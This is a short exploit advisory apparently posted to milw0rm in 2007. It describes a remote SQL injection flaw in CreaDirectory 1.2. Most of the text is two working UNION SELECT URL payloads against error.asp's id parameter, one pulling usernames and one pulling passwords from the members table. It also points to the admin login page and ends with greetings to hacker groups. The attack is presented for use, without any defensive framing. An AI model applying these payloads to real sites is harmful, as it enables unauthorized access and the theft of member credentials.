CreaDirectory 1.2 error.asp id Remote SQL Injection Vulnerability

							                    CreaDirectory 1.2 error.asp id Remote SQL Injection Vulnerability                             Page 1/1
  1    #Title : CreaDirectory v1.2 Remote SQL Injection Vulnerability
  2    #Author : CyberGhost
  3    #Demo Page   : http://www.creadirectory.com
  4    #Script Page : http://www.creascripts.com/creadirectory.asp
  5
  6    #Vuln.
  7
  8    #Username : /error.asp?id=−1+union+select+0,1,2,user_name,4,5,6,7,8,9,0,1,2,3,4,5+from+members
  9    #Password : /error.asp?id=−1+union+select+0,1,2,ipassword,4,5,6,7,8,9,0,1,2,3,4,5+from+members
  10
  11   #Admin Login : /admin.asp
  12
  13   #Info : Username and Password in browser title !
  14   ====================================
  15
  16   Thanx : redLine − Hackinger − excellance − Liarhack − SaCReD SeeR − MaTRax − KinSize − BolivaR − kerem125 − by_emR3
  17
  18   And All TURKISH HACKERS !
  19
  20   # milw0rm.com [2007−04−19]




CyberGhost                                                                                                         04/19/2007